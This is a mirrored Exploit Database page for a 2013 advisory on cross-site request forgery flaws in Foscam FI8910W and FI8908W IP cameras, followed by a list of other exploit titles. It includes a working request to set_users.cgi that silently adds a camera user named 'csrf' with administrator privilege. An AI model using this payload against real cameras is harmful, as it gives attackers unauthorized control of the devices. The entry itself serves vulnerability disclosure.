Foscam IP (Multiple Cameras) – Multiple Cross-Site Request Forgery Vulnerabilities

Exploit Database
58 阅读

作者： shekyan

日期： 2013-04-09
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/38437/

source: https://www.securityfocus.com/bid/58943/info

Multiple Foscam IP Cameras are prone to multiple cross-site request-forgery vulnerabilities.

Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

The following products are vulnerable:

Foscam FI8910W running Embedded Web Interface 2.4.10.3
Foscam FI8908W running Embedded Web Interface 2.4.10.3

http://www.example.com/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=

last Exploits
Foscam IP (Multiple Cameras) – Multiple Cross-Site Request Forgery Vulnerabilities的更多信息

DWebPro 8.4.2 – Multiple Vulnerabilities：
BigAnt Server 2.97 – DDNF ‘Username’ Remote Buffer Overflow：
Microsoft Windows – (Authenticated) User Code Execution (Metasploit)：
HP Easy Printer Care – XMLSimpleAccessor Class ActiveX Control Remote Code Execution (Metasploit)：
Belkin G Wireless Router Firmware 5.00.12 – Remote Code Execution：
J-Integra 2.11 – ActiveX SetIdentity() Buffer Overflow：
ALLMediaServer 0.95 – Remote Buffer Overflow：
Quantum vmPRO – Backdoor Command (Metasploit)：